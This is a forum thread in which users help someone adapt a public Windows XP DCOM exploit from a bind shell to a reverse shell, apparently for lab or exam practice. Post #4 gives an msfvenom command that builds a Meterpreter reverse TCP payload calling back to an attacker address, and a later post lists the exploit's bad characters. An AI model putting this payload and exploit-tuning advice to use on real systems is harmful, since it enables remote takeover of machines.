Results 1 to 6 of 6

Thread: XP DCOM custom windows reverse shell exploit issue Share/Save - My123World.Com!

  1. #1

    XP DCOM custom windows reverse shell exploit issue

    Hi Everyone,

    I am trying to modify the exploit located here on https://www.exploit-db.com/exploits/66/
    the thing that i am trying is to replace the existing bind shell on port 4444 with my reverse shell hex chars but i am facing issue with finding out the bad chars for this exploit
    and the return address, Can you please help me to convert this exploit into a reverse shell exploit? and also how can i go about this return address for this type of public exploits.

    thanks in advance

  2. #2
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744
    Do hit-n-trial for bad chars.
    For return address, which OS are you using?

    Cheers!
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  3. #3
    i can do hit and trail but there are many hex chars, and it is very time consuming and here the issue is i cannot even use immunity to see the registers dump so as to identify the bad char, are there any other ways to go about this?

    I am using kali for exploiting XP machine

    any suggestions for return address?

  4. #4

    Lightbulb how to use the MSFVENOM for reverse shell.

    Very first wget the the exploit code into your machine and try to run the exploit if it opening the bind port successfully opened, then check go for updating the exploit with reverse shell code.

    Code:
    netstat -an | find "4444"
    If you would like to generate the quick reverse shell, I would like to suggest you to use msfvenom

    Code:
    msfvenom  --platform windows -p windows/x64/meterpreter_reverse_tcp  LHOST=192.168.0.1 LPORT=443 -b "\x00" -t raw
    And also I would like to suggest you to look into the the size of the shellcode, which you generated or developed. Depend on the exiting default exploit shellcode size - add and remove NOP.

    I hope this will help you.
    Garage4Hackers bugs for the community , of the community

    We provide IT
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    :
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  5. #5
    Hi [S],

    I actually tried this before asking the query here, however failed to exploit.
    One of the reason for failing was the bad character, as there are more bad characters than just "/x00", i have got the list of bad characters now while checking out the same exploit in the metasploit directories there they have mentioned all the bad characters, Below are the bad chars:

    \x00\x0a\x0d\x5c\x5f\x2f\x2e

    i haven't reworked this, but will do once i get free from the lab.


    If anybody in forum gets a chance to try this then please share your experience.

  6. #6
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744
    Quote Originally Posted by mayank7651 View Post
    Hi [S],

    I actually tried this before asking the query here, however failed to exploit.
    One of the reason for failing was the bad character, as there are more bad characters than just "/x00", i have got the list of bad characters now while checking out the same exploit in the metasploit directories there they have mentioned all the bad characters, Below are the bad chars:

    \x00\x0a\x0d\x5c\x5f\x2f\x2e

    i haven't reworked this, but will do once i get free from the lab.


    If anybody in forum gets a chance to try this then please share your experience.
    Thanks for the feedback!
    Best wishes for you labs & exam.
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •